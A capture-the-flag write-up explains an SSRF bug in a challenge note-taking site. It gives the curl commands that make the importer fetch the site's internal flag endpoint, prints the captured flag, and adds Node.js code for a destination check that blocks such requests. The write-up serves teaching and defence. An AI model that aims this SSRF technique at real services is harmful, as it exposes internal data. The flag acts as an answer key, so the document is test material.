Category: Web Exploitation
Flag: TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
Challenge Description
Check out this cool note-taking website we made
Everything about the challenge is in the website itself. https://webchal1.vercel.app/
Analysis
The app was a note-taking site with an import feature, so the first thing I checked was the challenge page hint to see what was actually protected. It explicitly pointed at an internal flag endpoint and confirmed the expected flag format, which immediately suggested SSRF through the import flow.
curl -s "https://webchal1.vercel.app/challenge" | rg -o "(/api/internal/flag|TACHYON\{\.\.\.\}|internal endpoint)"
/api/internal/flag
TACHYON{...}
/api/internal/flag
TACHYON{...}
At that point, I verified how the frontend actually submits imports by checking the client chunk used by /import. Seeing /api/notes/import in the bundle gave the exact backend route to hit directly.
curl -s "https://webchal1.vercel.app/_next/static/chunks/97ef6067a1b24432.js" | rg -o "/api/notes/import"
/api/notes/import
From there, the solve was clean: send the importer a URL pointing to the internal flag API on the same host, capture the session cookie the import response sets (-c) and replay it (-b) when reading the notes back, then extract the flag pattern from the stored note. It worked right away, which felt very satisfying.

curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
The core bug is server-side URL fetching without any restriction on the destination: the importer fetches whatever URL the client supplies, including the app's own /api/internal/flag, and stores the response body as a note that the same session can read back. That makes the import feature a classic SSRF primitive, with the stored note acting as the exfiltration channel.
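As an added example that is not part of this writeup or the challenge's own code, here is the kind of destination check the importer was missing, written for Node.js since the /_next/static chunk path shows the app is a Next.js deployment. The hostname list, the function names and the injected fetcher are assumptions made for illustration; the challenge host is used only as sample data.

```javascript
// Added example, not the challenge's or the writeup's code: a destination check
// for a server-side URL importer. Names and the SELF_HOSTS list are assumptions.

// Hostnames the importer itself serves. Assumption: a deployment knows its own
// public hostname(s); the challenge host stands in as sample data.
const SELF_HOSTS = new Set(["webchal1.vercel.app"]);

// WHATWG URL parsing (the `URL` global) canonicalises IPv4 shorthand such as
// 127.1 or 0x7f000001 to dotted-quad form, so a dotted-quad regex is enough
// after parsing; anything containing a colon is IPv6.
function ipVersion(host) {
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) return 4;
  if (host.includes(":")) return 6;
  return 0;
}

// Unspecified, loopback, RFC 1918, link-local (which includes the
// 169.254.169.254 cloud metadata address) and shared-address-space ranges.
function isPrivateIPv4(ip) {
  const [a, b] = ip.split(".").map(Number);
  return (
    a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 100 && b >= 64 && b <= 127)
  );
}

// Unspecified, loopback, link-local and unique-local IPv6, plus IPv4-mapped
// addresses, which the URL parser serialises as ::ffff:hhhh:hhhh.
function isPrivateIPv6(ip) {
  const l = ip.toLowerCase();
  if (l === "::1" || l === "::") return true;
  if (/^fe[89ab]/.test(l) || /^f[cd]/.test(l)) return true;
  const mapped = l.match(/^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/);
  if (mapped) {
    const hi = parseInt(mapped[1], 16), lo = parseInt(mapped[2], 16);
    return isPrivateIPv4(`${hi >> 8}.${hi & 0xff}.${lo >> 8}.${lo & 0xff}`);
  }
  return false;
}

// Decide whether the importer may fetch `raw`. Returns {ok, reason, url}.
function checkImportUrl(raw, selfHosts = SELF_HOSTS) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { ok: false, reason: "scheme" }; // no file:, gopher:, data:, ...
  }
  if (url.username || url.password) {
    return { ok: false, reason: "userinfo" }; // https://trusted@evil/ lookalikes
  }
  // Node's WHATWG URL keeps the brackets on IPv6 hostnames.
  const host = url.hostname.replace(/^\[|\]$/g, "");
  if (host === "localhost" || host.endsWith(".localhost") || selfHosts.has(host)) {
    return { ok: false, reason: "self" }; // the same-host trick used in the solve
  }
  const v = ipVersion(host);
  if ((v === 4 && isPrivateIPv4(host)) || (v === 6 && isPrivateIPv6(host))) {
    return { ok: false, reason: "private" };
  }
  return { ok: true, reason: null, url: url.href };
}

// Where the check belongs: before any network call. `fetcher` is injected so
// the example runs offline; a real handler would pass the global fetch.
async function importNote(raw, fetcher) {
  const verdict = checkImportUrl(raw);
  if (!verdict.ok) return { status: 400, error: `rejected: ${verdict.reason}` };
  // Not following redirects stops an allowed host from bouncing the importer
  // onto an internal URL that this check never saw.
  const res = await fetcher(verdict.url, { redirect: "manual" });
  if (res.status !== 200) return { status: 502, error: `upstream ${res.status}` };
  return { status: 201, body: await res.text() };
}
```

Two caveats a practitioner would want. First, a hostname check alone does not stop a public DNS name that resolves to an internal address (DNS rebinding); the resolved address has to be re-validated at connect time, or the fetch pinned to the vetted IP. Second, on a platform like this one the "internal" endpoint sits on the same public hostname, so a network-layer block would not have helped; the endpoint itself should require a credential that the importer does not forward, and the self-host check above is defense in depth, not the whole fix.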
Solution
curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}